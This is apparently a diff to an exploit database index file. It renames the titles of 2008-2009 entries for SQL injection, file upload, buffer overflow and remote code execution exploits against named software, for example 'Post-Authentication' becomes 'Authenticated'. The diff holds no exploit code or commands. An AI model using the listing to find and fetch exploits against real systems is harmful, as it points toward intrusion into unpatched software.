 5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
 5453,platforms/windows/dos/5453.pl,"DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)",2008-04-15,securfrog,windows,dos,0
 5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0
@@ -5128,7 +5127,7 @@ id,file,description,date,author,platform,type,port
 5490,platforms/php/webapps/5490.pl,"YouTube Clone Script - 'spages.php' Remote Code Execution",2008-04-23,Inphex,php,webapps,0
 5491,platforms/php/webapps/5491.txt,"Joomla Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps,0
 5492,platforms/windows/local/5492.cpp,"DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow",2008-04-24,lhoang8500,windows,local,0
-5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - Post-Authentication SQL Injection",2008-04-24,His0k4,php,webapps,0
+5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - Authenticated SQL Injection",2008-04-24,His0k4,php,webapps,0
 5494,platforms/php/webapps/5494.txt,"minibb 2.2 - (Cross-Site Scripting / SQL Injection / Full Path Disclosure) Multiple Vulnerabilities",2008-04-25,girex,php,webapps,0
 5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule - (eid) SQL Injection",2008-04-25,Kacper,php,webapps,0
 5496,platforms/windows/remote/5496.html,"Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods",2008-04-25,callAX,windows,remote,0
@@ -5228,7 +5227,7 @@ id,file,description,date,author,platform,type,port
 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0
 5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0
 5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
-5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 - (FileManager module) File Upload",2008-05-12,EgiX,php,webapps,0
+5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload",2008-05-12,EgiX,php,webapps,0
 5601,platforms/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - SQL Injection",2008-05-12,Stack,php,webapps,0
 5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php id' SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
 5603,platforms/php/webapps/5603.txt,"EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0
@@ -5336,7 +5335,7 @@ id,file,description,date,author,platform,type,port
 5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'index.php mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
 5707,platforms/php/webapps/5707.txt,"Social Site Generator - (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0
 5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0
-5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Post-Authentication)",2008-05-31,securfrog,windows,dos,0
+5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated)",2008-05-31,securfrog,windows,dos,0
 5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0
 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
 5712,platforms/multiple/dos/5712.pl,"Samba (client) - receive_smb_raw() Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
@@ -5376,7 +5375,7 @@ id,file,description,date,author,platform,type,port
 5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0
 5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0
-5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post-Authentication) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
+5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
 5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0
 5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0
 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0
@@ -5439,7 +5438,7 @@ id,file,description,date,author,platform,type,port
 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0
 5812,platforms/php/webapps/5812.txt,"PHPMyCart - 'shop.php cat' SQL Injection",2008-06-14,anonymous,php,webapps,0
 5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0
-5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Post-Authentication Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0
+5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0
 5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Blind SQL Injection",2008-06-14,anonymous,php,webapps,0
 5816,platforms/php/webapps/5816.pl,"DIY - (index_topic did) Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0
 5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0
@@ -5589,7 +5588,7 @@ id,file,description,date,author,platform,type,port
 5965,platforms/php/webapps/5965.txt,"Joomla Component beamospetition - SQL Injection",2008-06-28,His0k4,php,webapps,0
 5966,platforms/php/webapps/5966.pl,"Joomla Component Xe webtv - 'id' Blind SQL Injection",2008-06-28,His0k4,php,webapps,0
 5967,platforms/php/webapps/5967.txt,"SebracCMS 0.4 - Multiple SQL Injections",2008-06-28,shinmai,php,webapps,0
-5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 - Post-Authentication IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",windows,dos,0
+5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",windows,dos,0
 5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - (pow) SQL Injection",2008-06-30,anonymous,php,webapps,0
 5970,platforms/php/webapps/5970.txt,"eSHOP100 - (SUB) SQL Injection",2008-06-30,JuDge,php,webapps,0
 5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin",2008-06-30,"CWH Underground",php,webapps,0
@@ -5710,14 +5709,14 @@ id,file,description,date,author,platform,type,port
 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0
 6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
 6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0
-6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - (Post-Authentication) Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
+6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
 6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0
 6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
 6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0
 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0
 6099,platforms/php/webapps/6099.txt,"Siteframe - 'folder.php id' SQL Injection",2008-07-18,n0ne,php,webapps,0
 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows/x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80
-6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Pre-Authentication Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0
+6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0
 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0
 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0
 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0
@@ -5998,7 +5997,7 @@ id,file,description,date,author,platform,type,port
 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0
 6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0
 6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0
-6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
+6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0
 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
 6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
@@ -6090,7 +6089,7 @@ id,file,description,date,author,platform,type,port
 6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) SQL Injection",2008-09-21,"Hussin X",php,webapps,0
 6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0
 6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0
-6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Post-Authentication) File Upload",2008-09-21,InjEctOr5,php,webapps,0
+6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
 6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0
 6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0
 6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0
@@ -6233,8 +6232,8 @@ id,file,description,date,author,platform,type,port
 6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
-6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Post-Authentication) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
-6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
+6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
+6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Authenticated) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0
 6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0
@@ -6270,7 +6269,7 @@ id,file,description,date,author,platform,type,port
 6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
 6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection",2008-10-07,d3v1l,php,webapps,0
 6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0
-6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site File Upload Attack (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0
+6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0
 6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0
 6701,platforms/php/webapps/6701.txt,"HispaH textlinksads - 'index.php' SQL Injection",2008-10-08,InjEctOr5,php,webapps,0
 6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - (campaignId) SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0
@@ -6290,7 +6289,7 @@ id,file,description,date,author,platform,type,port
 6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - PoC (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
 6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0
 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0
-6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Pre-Authentication Denial of Service",2008-10-10,rAWjAW,windows,dos,0
+6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0
 6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0
 6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
 6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php faq' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
@@ -6369,18 +6368,18 @@ id,file,description,date,author,platform,type,port
 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0
 6798,platforms/windows/local/6798.pl,"VLC Media Player - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
 6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0
-6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Post-Authentication) SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
+6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
 6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0
 6802,platforms/php/webapps/6802.txt,"Joomla Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0
 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0
 6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22
 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
 6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0
-6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (Post-Authentication) (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
+6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
 6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0
 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0
 6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0
-6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Post-Authentication) SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
+6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0
 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0
 6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
@@ -6649,7 +6648,7 @@ id,file,description,date,author,platform,type,port
 7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
 7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0
-7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass Exploit",2008-11-10,G4N0K,php,webapps,0
+7087,platforms/php/webapps/7087.txt,"AJ Auction - Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
 7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0
 7089,platforms/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps,0
 7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0
@@ -6928,7 +6927,7 @@ id,file,description,date,author,platform,type,port
 7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusion",2008-12-08,DSecRG,php,webapps,0
 7381,platforms/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0
 7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - (Cross-Site Request Forgery) SQL Injection",2008-12-08,"Michael Brooks",php,webapps,0
-7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site File Upload",2008-12-08,"Michael Brooks",php,webapps,0
+7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site Arbitrary File Upload",2008-12-08,"Michael Brooks",php,webapps,0
 7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 - (Cross-Site Request Forgery) Change Administrative Password Exploit",2008-12-08,"Michael Brooks",windows,remote,0
 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps,0
 7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board 4) Blind SQL Injection",2008-12-08,StAkeR,php,webapps,0
@@ -7052,7 +7051,7 @@ id,file,description,date,author,platform,type,port
 7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0
 7507,platforms/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL Injection",2008-12-17,StAkeR,php,webapps,0
 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0
-7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0
+7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary .PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0
 7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0
 7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0
 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution",2008-12-18,StAkeR,php,webapps,0
@@ -7178,7 +7177,7 @@ id,file,description,date,author,platform,type,port
 7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0
 7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0
 7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)",2009-01-01,"aBo MoHaMeD",windows,dos,0
-7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote PHP File Upload",2009-01-01,Lo$er,php,webapps,0
+7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote Arbitrary .PHP File Upload",2009-01-01,Lo$er,php,webapps,0
 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0
 7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - (Authentication Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0
 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - (news.php newsid) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0
@@ -7412,7 +7411,7 @@ id,file,description,date,author,platform,type,port
 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0
 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0
 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0
-7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - 'LIST' Post-Authentication Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21
+7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21
 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - ''Username'' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0
 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0
 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0
@@ -7444,7 +7443,7 @@ id,file,description,date,author,platform,type,port
 7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,php,webapps,0
 7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0
 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0
-7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload",2009-01-29,"Michael Brooks",php,webapps,0
+7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote Arbitrary .PHP File Upload",2009-01-29,"Michael Brooks",php,webapps,0
 7910,platforms/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0
 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0
 7912,platforms/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - Clickjacking",2009-01-29,UzmiX,windows,remote,0
@@ -7516,7 +7515,7 @@ id,file,description,date,author,platform,type,port
 7982,platforms/asp/webapps/7982.txt,"team 1.x - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0
 7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
 7985,platforms/windows/dos/7985.pl,"Novell Groupwise 8.0 - Malformed RCPT command Off-by-One Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0
-7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - (Authorization) Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos,0
+7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos,0
 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0
 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows XP)",2009-02-04,"Rob Carter",windows,remote,0
 7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows Vista)",2009-02-04,"Rob Carter",windows,remote,0
@@ -7528,7 +7527,7 @@ id,file,description,date,author,platform,type,port
 7995,platforms/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",windows,dos,0
 7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0
 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0
-7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
+7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0
